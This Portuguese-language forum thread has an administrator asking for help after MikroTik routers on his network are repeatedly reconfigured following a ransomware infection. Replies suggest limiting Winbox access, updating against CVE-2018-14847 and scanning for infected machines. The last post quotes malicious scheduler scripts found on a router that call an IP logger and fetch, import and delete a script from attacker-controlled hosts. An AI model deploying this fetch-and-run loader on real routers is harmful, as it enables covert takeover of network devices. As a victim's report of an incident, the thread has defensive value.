Ataques ao Mikrotik

ricton
(usa Ubuntu)

Enviado em 15/10/2018 - 11:02h

Bom dia, gostaria de um auxilio para impedir ataques e alterações de configurações em mikrotiks da rede.. Faz uns 20 dias que venho sofrendo diversos ataques após uma infecção ransomware em alguns computadores da minha rede. Toda semana preciso excluir algumas regras que estão sendo criadas dentro dos dispositivos mikrotik.

ricton
(usa Ubuntu)

Enviado em 15/10/2018 - 11:06h

Esta sendo habilitado o webproxy e limitando acesso a diversos sites, tambem o acesso externo ao mikrotik.

https://drive.google.com/open?id=17LFICrf6Zvw67p-tXQs7nudSgu48pj_U

danniel-lara
(usa Fedora)

Enviado em 15/10/2018 - 11:18h

eu deixo somente o acesso via winbox interno , e deixo uma vpn configurada para acesso , e também é bom sempre atualizar o mk , e faz backup do mesmo com frequência .

ricton
(usa Ubuntu)

Enviado em 15/10/2018 - 11:34h

Então... Sou de SC e presto suporte remoto em uma empresa de RJ. Foi bloqueado todo acesso ao mikrotik, senhas aletradas, atualizado e deixado apenas o acesso ao Winbox, porém normalmente aos fins de semana isso ocorre. Ao chegar na segunda esta com essas regras e bloqueios que não coloquei.

souzacarlos
(usa Outra)

Enviado em 15/10/2018 - 11:41h

Bom dia.
RBs anteriores ao update 6.42 estão vulneráveis a este problema conforme CVE-2018-14847 de abril - Recomendo atualizar urgentemente, claro algumas configurações extras podem ser habilitadas para melhorar as camadas de segurança no acesso a RB conforme o colega também citou.





Network Analyst - Consultor para empresas
contact skype: carlossouzainfo
21 99180-8165 (WhattsApp)

ricton
(usa Ubuntu)

Enviado em 15/10/2018 - 11:54h

Acabei de limpar todas as regras novamente e deixei apenas o acesso interno via winbox. Vamos ver como se comporta.

rabbit
(usa Debian)

Enviado em 16/10/2018 - 09:54h

Fala mano,

Vou te dar um sugestão. Já tive algumas experiências com Ransomwares e li algumas matérias e livros sobre justamente porque estava sendo atacado direto após ter sofrido com essa praga.
Caso você ainda não tenho verificado os computadores infectados, faça a varredura urgentemente e se possível de toda a rede.
Se você ainda está sofrendo ataques, é porque o arquivo malicioso ainda está na sua rede.

Geralmente um ransoware abre as portas 80 e 443 de uma máquina para acesso externo a elas.
O Ransomware se comunica com o servidor dele para receber novas instruções ou até mesmo continuar o ataque.

*Procure por ips originados de países como russia, vietnam, ips fora do uso comum da empresa no dia a dia.
E se tiver um servidor proxy, verifique os nomes do domínios. Os nomes sempre são "estranhos".

x.x
run rabbit run

ricton
(usa Ubuntu)

Enviado em 16/10/2018 - 10:42h

Verifiquei hoje cedo ao desabilitar acesso externo da rede se teve a alteração das configurações do Mikrotik, até então nada anormal..

Ontem estava com esses dois script dentro do Scheduler.

1.

:do {/tool fetch url=http://iplogger.co/1DFrN6 mode=http keep-result=no} on-error={}

2.

:do {/tool fetch url="http://min01.com:31416/min01?key=DxBUsHeqACnnCM&part=6" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url="http://mikr0tik.com:31416/mikr0tik?key=DxBUsHeqACnnCM&part=6" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url="http://up0.bit:31416/up0?key=DxBUsHeqACnnCM&part=6" mode=http dst-path=u113.rsc} on-error={}
:do {/import u113.rsc} on-error={}
:do {/file remove u113.rsc} on-error={}